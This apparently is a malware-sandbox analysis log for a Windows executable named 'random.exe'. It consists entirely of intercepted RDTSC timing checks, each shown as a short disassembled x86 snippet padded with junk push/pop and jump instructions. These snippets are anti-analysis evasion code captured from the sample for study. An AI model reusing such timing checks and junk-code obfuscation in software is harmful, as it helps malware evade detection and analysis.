Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B6535 second address: 99F059 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5FF4AFEFFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007F5FF4AFF00Dh 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F5FF4AFF003h 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F5FF4AFEFF8h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 adc cl, FFFFFFFFh 0x00000038 call dword ptr [ebp+122D25B5h] 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F5FF4AFEFFFh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 99F059 second address: 99F066 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9ECAFD second address: 9ECB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9ECC47 second address: 9ECC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9ECC52 second address: 9ECC5E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5FF4AFEFF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9ECC5E second address: 9ECC74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F5FF4F12446h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9ECF5B second address: 9ECF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FF4AFF007h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9ECF76 second address: 9ECF80 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5FF4F12446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9ED261 second address: 9ED267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9ED267 second address: 9ED270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F2E49 second address: 9F2E51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F2FBC second address: 9F2FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FF4F12456h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F2FD8 second address: 9F2FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F5FF4AFEFF6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F2FE5 second address: 9F2FF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F1244Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F2A22 second address: 9F2A3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF004h 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F2A3D second address: 9F2A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F383F second address: 9F385A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FF4AFF007h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F385A second address: 9F386A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5FF4F12446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F3C7E second address: 9F3C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5FF4AFF007h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F3C9D second address: 9F3CA3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9FA89B second address: 9FA8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5FF4AFEFF6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F5FF4AFEFF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9FA8AE second address: 9FA8BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jg 00007F5FF4F12446h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F9358 second address: 9F939D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5FF4AFF005h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jnp 00007F5FF4AFEFF6h 0x00000012 pop edi 0x00000013 pop edx 0x00000014 pushad 0x00000015 jnl 00007F5FF4AFF00Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F939D second address: 9F93A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F93A3 second address: 9F93D5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5FF4AFEFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F5FF4AFF002h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5FF4AFF002h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F9657 second address: 9F9667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FF4F1244Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F9667 second address: 9F966F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F966F second address: 9F9692 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12453h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F5FF4F12446h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F9692 second address: 9F96A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF001h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F96A9 second address: 9F96AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F9993 second address: 9F9997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F9997 second address: 9F99A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F99A1 second address: 9F99CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F5FF4AFF011h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F99CB second address: 9F99E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12450h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F99E1 second address: 9F99E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F9B23 second address: 9F9B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F9C49 second address: 9F9C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9FA03E second address: 9FA050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jns 00007F5FF4F12446h 0x0000000c ja 00007F5FF4F12446h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9FA050 second address: 9FA056 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9FA056 second address: 9FA06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F5FF4F1244Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F909D second address: 9F90AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FF4AFEFFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9F90AD second address: 9F90D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12450h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F5FF4F1244Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A00D6F second address: A00D88 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5FF4AFF001h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A00D88 second address: A00D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A00D8C second address: A00D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A0103A second address: A01040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A01040 second address: A0105C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5FF4AFF007h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A0105C second address: A01066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A03A4E second address: A03A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FF4AFF005h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A03A67 second address: A03A6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A035BB second address: A035C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A035C3 second address: A035E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5FF4F12458h 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A0373D second address: A03741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A09227 second address: A09239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FF4F1244Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A09239 second address: A0924D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnl 00007F5FF4AFEFF6h 0x0000000b pop ebx 0x0000000c js 00007F5FF4AFEFFEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A096D2 second address: A096F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push ebx 0x00000009 jmp 00007F5FF4F12456h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B5F46 second address: 9B5F78 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5FF4AFEFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f add ch, 00000036h 0x00000012 mov dword ptr [ebp+122D2ADAh], ecx 0x00000018 popad 0x00000019 push 00000004h 0x0000001b mov di, A0DFh 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5FF4AFF000h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A0985F second address: A09876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F5FF4F1244Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A09876 second address: A0987C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A0987C second address: A09882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A09882 second address: A09887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A09887 second address: A0988D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A0988D second address: A09893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A11EA2 second address: A11EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5FF4F12446h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A11EB1 second address: A11EB9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A11EB9 second address: A11ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12453h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1A53E second address: A1A548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1A548 second address: A1A54D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1A54D second address: A1A597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF001h 0x00000007 pushad 0x00000008 jmp 00007F5FF4AFEFFBh 0x0000000d jmp 00007F5FF4AFF008h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 ja 00007F5FF4AFEFFCh 0x0000001f jg 00007F5FF4AFEFF6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A183DF second address: A183E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5FF4F12446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A186E0 second address: A1870D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007F5FF4AFF008h 0x0000000e jmp 00007F5FF4AFEFFBh 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1870D second address: A18715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A18715 second address: A18719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A18719 second address: A18759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FF4F12452h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F5FF4F12458h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a ja 00007F5FF4F12446h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A18759 second address: A1875F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A18DEB second address: A18DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A18DF1 second address: A18DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A18DF5 second address: A18E30 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5FF4F12446h 0x00000008 jmp 00007F5FF4F1244Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007F5FF4F1244Ch 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5FF4F12455h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A19613 second address: A19619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A19C6C second address: A19C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A19C70 second address: A19C74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A19F57 second address: A19F61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5FF4F12446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1EAA3 second address: A1EAB1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5FF4AFEFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1EAB1 second address: A1EAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1EBF1 second address: A1EBFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F5FF4AFEFF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1EBFC second address: A1EC02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1EC02 second address: A1EC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5FF4AFF006h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1EC21 second address: A1EC27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1EC27 second address: A1EC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FF4AFF004h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1ED87 second address: A1EDAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12451h 0x00000007 jmp 00007F5FF4F12452h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1EDAE second address: A1EDB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1EDB4 second address: A1EDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1EDBA second address: A1EDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A1F0B1 second address: A1F0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2D898 second address: A2D8BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F5FF4AFF004h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F5FF4AFEFF6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2D8BA second address: A2D8BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2BDC4 second address: A2BDCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
